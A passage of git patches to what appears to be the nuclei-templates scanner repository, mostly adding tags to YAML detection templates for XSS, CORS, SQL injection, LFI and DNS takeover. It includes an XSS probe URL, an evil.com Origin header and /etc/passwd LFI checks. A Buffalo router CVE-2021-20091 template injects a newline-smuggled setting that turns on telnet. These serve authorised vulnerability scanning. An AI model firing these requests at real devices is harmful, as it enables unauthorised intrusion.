"{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 791472aa2b2e5cad5839d8406abe3dedacac6f63 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:07:05 +0530 Subject: [PATCH 1553/4083] Update basic-cors.yaml --- vulnerabilities/generic/basic-cors.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml index a224186e83..b8b4c8044e 100644 --- a/vulnerabilities/generic/basic-cors.yaml +++ b/vulnerabilities/generic/basic-cors.yaml @@ -4,7 +4,7 @@ info: name: Basic CORS misconfiguration author: nadino severity: info - tags: cors + tags: cors,generic requests: - method: GET From 4d4ae2edd27eb3838b972bbbd1451a9526d2f5b7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:07:17 +0530 Subject: [PATCH 1554/4083] Update basic-xss-prober.yaml --- vulnerabilities/generic/basic-xss-prober.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/generic/basic-xss-prober.yaml b/vulnerabilities/generic/basic-xss-prober.yaml index 373c1235b5..e1a7c5b60a 100644 --- a/vulnerabilities/generic/basic-xss-prober.yaml +++ b/vulnerabilities/generic/basic-xss-prober.yaml @@ -4,7 +4,7 @@ info: name: Basic XSS Prober author: nadino,geeknik severity: low - tags: xss + tags: xss,generic # Basic XSS prober # Manual testing needed for exploitation @@ -28,4 +28,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 2165418c5900444855af0e1a923657b2f2e91ec5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:07:27 +0530 Subject: [PATCH 1555/4083] Update cache-poisoning.yaml --- vulnerabilities/generic/cache-poisoning.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml index 3b349afd09..87fade9c86 100644 --- a/vulnerabilities/generic/cache-poisoning.yaml +++ b/vulnerabilities/generic/cache-poisoning.yaml @@ -7,7 +7,7 @@ info: reference: | - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning - https://portswigger.net/research/practical-web-cache-poisoning - tags: cache + tags: cache,generic requests: - raw: From aa0b195c9933f55b37cf53a026b2f20cff5ab421 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:07:36 +0530 Subject: [PATCH 1556/4083] Update crlf-injection.yaml --- vulnerabilities/generic/crlf-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml index 7d7fe29698..262f9ca437 100644 --- a/vulnerabilities/generic/crlf-injection.yaml +++ b/vulnerabilities/generic/crlf-injection.yaml @@ -5,7 +5,7 @@ info: author: melbadry9,nadino,xElkomy severity: low description: Improper sanitization of CRLF sequences. - tags: crlf + tags: crlf,generic requests: - method: GET From cbfe76f33fbe28a8761a9c6bc78f4eeefa1e01ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:07:46 +0530 Subject: [PATCH 1557/4083] Update error-based-sql-injection.yaml --- vulnerabilities/generic/error-based-sql-injection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/error-based-sql-injection.yaml b/vulnerabilities/generic/error-based-sql-injection.yaml index 78257140e3..c0119a2e3c 100644 --- a/vulnerabilities/generic/error-based-sql-injection.yaml +++ b/vulnerabilities/generic/error-based-sql-injection.yaml @@ -5,7 +5,7 @@ info: author: geeknik severity: high description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml. - tags: sqli + tags: sqli,generic requests: - method: GET From 57b8d898153ca38e039821f4915ebe0e27f377f4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:08:00 +0530 Subject: [PATCH 1558/4083] Update generic-linux-lfi.yaml --- vulnerabilities/generic/generic-linux-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/generic-linux-lfi.yaml b/vulnerabilities/generic/generic-linux-lfi.yaml index ab9255ff05..a90cca9492 100644 --- a/vulnerabilities/generic/generic-linux-lfi.yaml +++ b/vulnerabilities/generic/generic-linux-lfi.yaml @@ -5,7 +5,7 @@ info: author: geeknik,unstabl3,pentest_swissky,sushantkamble severity: high description: Searches for /etc/passwd on passed URLs - tags: linux,lfi + tags: linux,lfi,generic requests: - method: GET From efa7319d40db002b11463f2fdac7203fd87b3e69 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:08:11 +0530 Subject: [PATCH 1559/4083] Update generic-windows-lfi.yaml --- vulnerabilities/generic/generic-windows-lfi.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/generic/generic-windows-lfi.yaml b/vulnerabilities/generic/generic-windows-lfi.yaml index c24ce81398..1e77b5937b 100644 --- a/vulnerabilities/generic/generic-windows-lfi.yaml +++ b/vulnerabilities/generic/generic-windows-lfi.yaml @@ -5,7 +5,7 @@ info: author: mesaglio,sushantkamble severity: high description: Searches for /windows/win.ini on passed URLs - tags: azure,windows,lfi + tags: azure,windows,lfi,generic requests: - method: GET @@ -28,4 +28,4 @@ requests: - "fonts" - "extensions" condition: and - part: body \ No newline at end of file + part: body From c576f4317bd1677e174a558daff85946f7687b12 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:08:24 +0530 Subject: [PATCH 1560/4083] Update open-redirect.yaml --- vulnerabilities/generic/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index a831248bd0..7941072763 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -5,7 +5,7 @@ info: author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik severity: low description: A user-controlled input redirect users to an external website. - tags: redirect + tags: redirect,generic requests: - method: GET From d49dc5f9d45c68b7ebf8a6e45f8fdb168803f5cf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:08:49 +0530 Subject: [PATCH 1561/4083] Update top-xss-params.yaml --- vulnerabilities/generic/top-xss-params.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml index 677a594c29..22e6628d29 100644 --- a/vulnerabilities/generic/top-xss-params.yaml +++ b/vulnerabilities/generic/top-xss-params.yaml @@ -5,7 +5,7 @@ info: author: foulenzer,geeknik severity: medium description: Searches for reflected XSS in the server response via GET-requests. - tags: xss + tags: xss,generic parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p requests: From cb94b580094c97218cd87b2c76f78f63aeaa09f5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:13:45 +0530 Subject: [PATCH 1562/4083] Update basic-cors.yaml --- vulnerabilities/generic/basic-cors.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml index a224186e83..85f9ebd824 100644 --- a/vulnerabilities/generic/basic-cors.yaml +++ b/vulnerabilities/generic/basic-cors.yaml @@ -2,7 +2,7 @@ id: basic-cors-misconfig info: name: Basic CORS misconfiguration - author: nadino + author: nadino,G4L1T0,convisoappsec severity: info tags: cors @@ -13,6 +13,7 @@ requests: headers: Origin: https://evil.com + matchers-condition: or matchers: - type: word words: @@ -20,3 +21,8 @@ requests: - "Access-Control-Allow-Credentials: true" condition: and part: header + + - type: word + part: header + words: + - "Access-Control-Allow-Origin: *" From 5ac272597b8ab5d98d76740bf8edecfc8308c443 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:14:04 +0530 Subject: [PATCH 1563/4083] Delete cors-misconfig.yaml --- vulnerabilities/generic/cors-misconfig.yaml | 22 --------------------- 1 file changed, 22 deletions(-) delete mode 100644 vulnerabilities/generic/cors-misconfig.yaml diff --git a/vulnerabilities/generic/cors-misconfig.yaml b/vulnerabilities/generic/cors-misconfig.yaml deleted file mode 100644 index 6c3b810df0..0000000000 --- a/vulnerabilities/generic/cors-misconfig.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: cors-misconfig - -info: - name: Cross-Origin Resource Sharing Misconfiguration - author: G4L1T0 and @convisoappsec - severity: info - tags: cors - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 - Origin: https://www.convisoappsec.com - matchers: - - type: word - part: header - words: - - "Access-Control-Allow-Origin: https://www.convisoappsec.com" - - "Access-Control-Allow-Origin: *" - condition: or From b466fce758464476a2a822d244d834d893d6ae2a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:15:04 +0530 Subject: [PATCH 1564/4083] Update basic-cors.yaml --- vulnerabilities/generic/basic-cors.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml index 85f9ebd824..f652c891f0 100644 --- a/vulnerabilities/generic/basic-cors.yaml +++ b/vulnerabilities/generic/basic-cors.yaml @@ -4,7 +4,8 @@ info: name: Basic CORS misconfiguration author: nadino,G4L1T0,convisoappsec severity: info - tags: cors + reference: https://portswigger.net/web-security/cors + tags: cors,generic requests: - method: GET From 09d78af28f7676d75388eba980b0da9bd694da20 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:28:45 +0530 Subject: [PATCH 1565/4083] Update missing-csp.yaml --- miscellaneous/missing-csp.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/missing-csp.yaml b/miscellaneous/missing-csp.yaml index 30fb524809..0d2a7dc176 100644 --- a/miscellaneous/missing-csp.yaml +++ b/miscellaneous/missing-csp.yaml @@ -4,7 +4,7 @@ info: author: geeknik severity: info description: Checks if there is a CSP header - tags: misc + tags: misc,generic requests: - method: GET From dd15b19fd5b6be529a9102929f8140428f1c8e69 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:28:55 +0530 Subject: [PATCH 1566/4083] Update missing-hsts.yaml --- miscellaneous/missing-hsts.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/missing-hsts.yaml b/miscellaneous/missing-hsts.yaml index 8999f233ab..3f07038249 100644 --- a/miscellaneous/missing-hsts.yaml +++ b/miscellaneous/missing-hsts.yaml @@ -4,7 +4,7 @@ info: author: Dawid Czarnecki severity: info description: Checks if the HSTS is enabled by looking for Strict Transport Security response header. - tags: misc + tags: misc,generic requests: - method: GET From 5e65406b444a808d1a1137ee07bc72db06042508 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:29:34 +0530 Subject: [PATCH 1567/4083] Update detect-options-method.yaml --- miscellaneous/detect-options-method.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/detect-options-method.yaml b/miscellaneous/detect-options-method.yaml index dbeba332e1..2a0a126efc 100644 --- a/miscellaneous/detect-options-method.yaml +++ b/miscellaneous/detect-options-method.yaml @@ -4,7 +4,7 @@ info: name: Detect enabled OPTIONS methods author: pdteam severity: info - tags: misc + tags: misc,generic requests: - method: OPTIONS From f1d4b4d8f7cf0764452be55e755aaadd1173db87 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:29:46 +0530 Subject: [PATCH 1568/4083] Update dir-listing.yaml --- miscellaneous/dir-listing.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/dir-listing.yaml b/miscellaneous/dir-listing.yaml index 0f4cbf8095..15c5c11756 100644 --- a/miscellaneous/dir-listing.yaml +++ b/miscellaneous/dir-listing.yaml @@ -4,7 +4,7 @@ info: name: Directory listing enabled author: _harleo,pentest_swissky severity: info - tags: misc + tags: misc,generic requests: - method: GET From c3f15363f216a1b5abb9fac914bd168203372973 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:29:55 +0530 Subject: [PATCH 1569/4083] Update display-via-header.yaml --- miscellaneous/display-via-header.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/display-via-header.yaml b/miscellaneous/display-via-header.yaml index a25dbbffb3..4f17e636dc 100644 --- a/miscellaneous/display-via-header.yaml +++ b/miscellaneous/display-via-header.yaml @@ -5,7 +5,7 @@ info: author: geeknik reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via severity: info - tags: misc + tags: misc,generic requests: - method: GET From 9ec08961d65523a5a35379444ff8d2a6982ff23b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:30:36 +0530 Subject: [PATCH 1570/4083] Update missing-x-content-type-options.yaml --- miscellaneous/missing-x-content-type-options.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/missing-x-content-type-options.yaml b/miscellaneous/missing-x-content-type-options.yaml index 008872b06b..e059f4c9be 100644 --- a/miscellaneous/missing-x-content-type-options.yaml +++ b/miscellaneous/missing-x-content-type-options.yaml @@ -5,7 +5,7 @@ info: author: G4L1T0 and @convisoappsec severity: info description: Check for X-Content-Type-Options header - tags: misc + tags: misc,generic requests: - method: GET From 0c01a608dc1c94c9c4d400f6f206a142c4155129 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:30:45 +0530 Subject: [PATCH 1571/4083] Update missing-x-frame-options.yaml --- miscellaneous/missing-x-frame-options.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/miscellaneous/missing-x-frame-options.yaml b/miscellaneous/missing-x-frame-options.yaml index c0e6c43079..a7bece93c3 100644 --- a/miscellaneous/missing-x-frame-options.yaml +++ b/miscellaneous/missing-x-frame-options.yaml @@ -4,7 +4,7 @@ info: name: Clickjacking (Missing XFO header) author: kurohost severity: low - tags: misc + tags: misc,generic requests: - method: GET @@ -16,4 +16,4 @@ requests: matchers: - type: dsl dsl: - - "!contains(tolower(all_headers), 'x-frame-options')" \ No newline at end of file + - "!contains(tolower(all_headers), 'x-frame-options')" From 3dff053a23e4644662ac2aa69c7ef5e5a46544a4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:30:55 +0530 Subject: [PATCH 1572/4083] Update robots.txt.yaml --- miscellaneous/robots.txt.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/robots.txt.yaml b/miscellaneous/robots.txt.yaml index 1518b8c2d3..f11e795855 100644 --- a/miscellaneous/robots.txt.yaml +++ b/miscellaneous/robots.txt.yaml @@ -3,7 +3,7 @@ info: name: robots.txt file author: CasperGN severity: info - tags: misc + tags: misc,generic requests: - method: GET From 3c0369aa989ad650134a12e34db8a2e86751d255 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:31:02 +0530 Subject: [PATCH 1573/4083] Update security.txt.yaml --- miscellaneous/security.txt.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/security.txt.yaml b/miscellaneous/security.txt.yaml index fd49456be4..b8ff504586 100644 --- a/miscellaneous/security.txt.yaml +++ b/miscellaneous/security.txt.yaml @@ -5,7 +5,7 @@ info: author: bad5ect0r severity: info description: The website defines a security policy. - tags: misc + tags: misc,generic requests: - method: GET From b240bd143d2a4e8e4100e1cc1b5ad1f40c0fa3ce Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 13:31:11 +0530 Subject: [PATCH 1574/4083] Update trace-method.yaml --- miscellaneous/trace-method.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/trace-method.yaml b/miscellaneous/trace-method.yaml index 00642b2608..00f9b49b0e 100644 --- a/miscellaneous/trace-method.yaml +++ b/miscellaneous/trace-method.yaml @@ -4,7 +4,7 @@ info: name: HTTP TRACE method enabled author: nodauf severity: info - tags: misc + tags: misc,generic reference: https://www.blackhillsinfosec.com/three-minutes-with-the-http-trace-method/ requests: From 0af081d0b0bfb45866e22cfd84c5afeebda62478 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?B=C3=B9i=20=C4=90=E1=BA=A1i=20Gia?= Date: Wed, 11 Aug 2021 17:21:09 +0700 Subject: [PATCH 1575/4083] Update can-i-take-over-dns.yaml --- dns/can-i-take-over-dns.yaml | 92 ------------------------------------ 1 file changed, 92 deletions(-) diff --git a/dns/can-i-take-over-dns.yaml b/dns/can-i-take-over-dns.yaml index c2a6153bfd..0c2c3d7052 100644 --- a/dns/can-i-take-over-dns.yaml +++ b/dns/can-i-take-over-dns.yaml @@ -41,11 +41,6 @@ dns: - "ns1.bizland.com" - "ns2.bizland.com" - - type: word - name: cloudflare - words: - - "ns.cloudflare.com" - - type: word name: digitalocean condition: or @@ -113,13 +108,6 @@ dns: - "ns1.linode.com" - "ns1.linode.com" - - type: word - name: mediatemple - condition: or - words: - - "ns1.mediatemple.net" - - "ns2.mediatemple.net" - - type: word name: mydomain condition: or @@ -150,83 +138,3 @@ dns: words: - "yns1.yahoo.com" - "yns2.yahoo.com" - - - type: word - name: domainpeople - condition: or - words: - - "ns1.domainpeople.com" - - "ns2.domainpeople.com" - - - type: word - name: hover - condition: or - words: - - "ns1.hover.com" - - "ns2.hover.com" - - - type: word - name: networksolutions - words: - - ".worldnic.com" - - - type: word - name: activision - words: - - ".activision.com" - - - type: word - name: aws-route53 - words: - - ".awsdns-" - - - type: word - name: apple - condition: or - words: - - "a.ns.apple.com" - - "b.ns.apple.com" - - "c.ns.apple.com" - - "d.ns.apple.com" - - - type: word - name: capitalone - condition: or - words: - - "ns1.capitalone.com" - - "ns2.capitalone.com" - - "ns3.capitalone.com" - - - type: word - name: csust - condition: or - words: - - "0xd0a1.csust.netm" - - "0xd0a2.csust.net" - - "0xd0a3.csust.net" - - "0xd0a4.csust.net" - - - type: word - name: disney - condition: or - words: - - "ns1.twdcns.com" - - "ns2.twdcns.com" - - "ns3.twdcns.info" - - "ns4.twdcns.info" - - "ns5.twdcns.co.uk" - - "ns6.twdcns.co.uk" - - - type: word - name: lowes - condition: or - words: - - "authns1.lowes.com" - - "authns2.lowes.com" - - - type: word - name: tmobile - condition: or - words: - - "ns10.tmobileus.com" - - "ns10.tmobileus.net" From 6096bc4db7edc88492eb6dadc633785aa59f045b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 11 Aug 2021 16:38:30 +0530 Subject: [PATCH 1576/4083] Update CVE-2019-12616.yaml --- cves/2019/CVE-2019-12616.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 2459cca5ed..12f581823e 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -31,4 +31,4 @@ requests: - type: status status: - 200 - - 401 #password protected + - 401 #password protected From 76d184331ce417ad37f147430af26eb134f72163 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 11 Aug 2021 17:57:58 +0530 Subject: [PATCH 1577/4083] minor update --- cves/2021/CVE-2021-20090.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20090.yaml b/cves/2021/CVE-2021-20090.yaml index 9a8b58fe37..79604d3e12 100644 --- a/cves/2021/CVE-2021-20090.yaml +++ b/cves/2021/CVE-2021-20090.yaml @@ -17,7 +17,7 @@ requests: - | GET /images/..%2finfo.html HTTP/1.1 Host: {{Hostname}} - Referer: {{BaseURL}}/images/info.html + Referer: {{BaseURL}}/info.html matchers-condition: and matchers: From b64f472b9132870683e0e379021589908c195e9c Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 11 Aug 2021 17:58:20 +0530 Subject: [PATCH 1578/4083] Added CVE-2021-20091 --- cves/2021/CVE-2021-20091.yaml | 52 +++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 cves/2021/CVE-2021-20091.yaml diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml new file mode 100644 index 0000000000..22d2c726b6 --- /dev/null +++ b/cves/2021/CVE-2021-20091.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-20091 + +info: + name: Buffalo WSR-2533DHPL2 - Configuration File Injection + author: gy741,pdteam,parth + severity: critical + description: | + The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + tags: cve,cve2021,buffalo,firmware,iot + +requests: + - raw: + - | + GET /images/..%2finfo.html HTTP/1.1 + Host: {{Hostname}} + Referer: {{{{BaseURL}}}}/info.html + + - | + POST /images/..%2fapply_abstract.cgi HTTP/1.1 + Host: {{Hostname}} + Cookie: lang=8; url=ping.html; mobile=false; + Referer: {{BaseURL}}/info.html + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 178 + + action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/Success.htm" + + - type: status + status: + - 302 + + extractors: + - type: regex + name: httoken + internal: true + group: 1 + regex: + - 'base64\,(.*?)" border=' \ No newline at end of file From 7c076d7e0efbda5ed08b2b5373f8623d447bf581 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 11 Aug 2021 18:28:37 +0530 Subject: [PATCH 1579/4083] Added CVE-2021-20092 --- cves/2021/CVE-2021-20092.yaml | 55 +++++++++++++++++++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 cves/2021/CVE-2021-20092.yaml diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml new file mode 100644 index 0000000000..2074155e32 --- /dev/null +++ b/cves/2021/CVE-2021-20092.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-20092 + +info: + name: Buffalo WSR-2533DHPL2 - Improper Access Control + author: gy741,pdteam,parth + severity: critical + description: | + The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor. + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2021-20091 + - https://www.tenable.com/security/research/tra-2021-13 + - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2 + tags: cve,cve2021,buffalo,firmware,iot + +requests: + - raw: + - | + GET /images/..%2finfo.html HTTP/1.1 + Host: {{Hostname}} + Referer: {{{{BaseURL}}}}/info.html + + - | + GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1 + Host: {{Hostname}} + Cookie: lang=8; url=ping.html; mobile=false; + Referer: {{BaseURL}}/info.html + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + Content-Type: application/x-www-form-urlencoded + Content-Length: 178 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/x-javascript" + - type: word + words: + - "/*DEMO*/" + - "addCfg(" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: httoken + internal: true + group: 1 + regex: + - 'base64\,(.*?)" border=' \ No newline at end of file From 1dc8aac5ccd8a91d7b9db3fbcf4da9e414152785 Mon Sep 17 00:00:00 2001 From: r3dg33k <2913793+r3dg33k@users.noreply.github.com> Date: Wed, 11 Aug 2021 14:31:18 -0400 Subject: [PATCH 1580/4083] bazarr-login --- exposed-panels/bazarr-login.yaml | 56 ++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 exposed-panels/bazarr-login.yaml diff --git a/exposed-panels/bazarr-login.yaml b/exposed-panels/bazarr-login.yaml new file mode 100644 index 0000000000..12f99e397a --- /dev/null +++ b/exposed-panels/bazarr-login.yaml @@ -0,0 +1,56 @@ +id: bazarr-login-detect + +info: + name: Bazarr Login Detect + author: r3dg33k + severity: info + reference: https://www.bazarr.media/ + tags: panel,bazarr,login + +requests: + - raw: + - | + GET /api/system/status HTTP/1.1 + Host: {{BaseURL}} + Connection: keep-alive + Accept: application/json, text/plain, */* + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 + X-API-KEY: 20f29876d89bcf390ab9988f9a5f0ecc + Sec-GPC: 1 + Referer: {{BaseURL}}/system/status + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + + - | + GET /login HTTP/1.1 + Host: {{BaseURL}} + Connection: keep-alive + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Sec-GPC: 1 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + + matchers-condition: and + matchers: + - type: word + words: + - '"data"' + - '"bazarr_config_directory"' + - '"bazarr_directory"' + - '"bazarr_version"' + - '"operating_system"' + - 'Bazarr' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - '"bazarr_version":\s"\d\.[0-9]+\.[0-9]+"' + - '"operating_system":\s"[^"]*"' \ No newline at end of file From e39325f756f910a1d7137cf7c1dd20c91ae6aff1 Mon Sep 17 00:00:00 2001 From: r3dg33k <2913793+r3dg33k@users.noreply.github.com> Date: Wed, 11 Aug 2021 21:41:55 +0300 Subject: [PATCH 1581/4083] Update bazarr-login.yaml --- exposed-panels/bazarr-login.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/exposed-panels/bazarr-login.yaml b/exposed-panels/bazarr-login.yaml index 12f99e397a..506bb77dda 100644 --- a/exposed-panels/bazarr-login.yaml +++ b/exposed-panels/bazarr-login.yaml @@ -20,7 +20,7 @@ requests: Referer: {{BaseURL}}/system/status Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 - + - | GET /login HTTP/1.1 Host: {{BaseURL}} @@ -32,11 +32,11 @@ requests: Sec-GPC: 1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 - + matchers-condition: and matchers: - - type: word - words: + - type: word + words: - '"data"' - '"bazarr_config_directory"' - '"bazarr_directory"' @@ -53,4 +53,4 @@ requests: part: body regex: - '"bazarr_version":\s"\d\.[0-9]+\.[0-9]+"' - - '"operating_system":\s"[^"]*"' \ No newline at end of file + - '"operating_system":\s"[^"]*"' From 47bc54b2fdd208204a1b117b72a9606c80e3eb70 Mon Sep 17 00:00:00 2001 From: r3dg33k <2913793+r3dg33k@users.noreply.github.com> Date: Wed, 11 Aug 2021 21:45:58 +0300 Subject: [PATCH 1582/4083] Update bazarr-login.yaml --- exposed-panels/bazarr-login.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/exposed-panels/bazarr-login.yaml b/exposed-panels/bazarr-login.yaml index 506bb77dda..d80cd7c5dc 100644 --- a/exposed-panels/bazarr-login.yaml +++ b/exposed-panels/bazarr-login.yaml @@ -20,7 +20,7 @@ requests: Referer: {{BaseURL}}/system/status Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 - + - | GET /login HTTP/1.1 Host: {{BaseURL}} @@ -32,18 +32,18 @@ requests: Sec-GPC: 1 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 - + matchers-condition: and matchers: - - type: word - words: + - type: word + words: - '"data"' - '"bazarr_config_directory"' - '"bazarr_directory"' - '"bazarr_version"' - 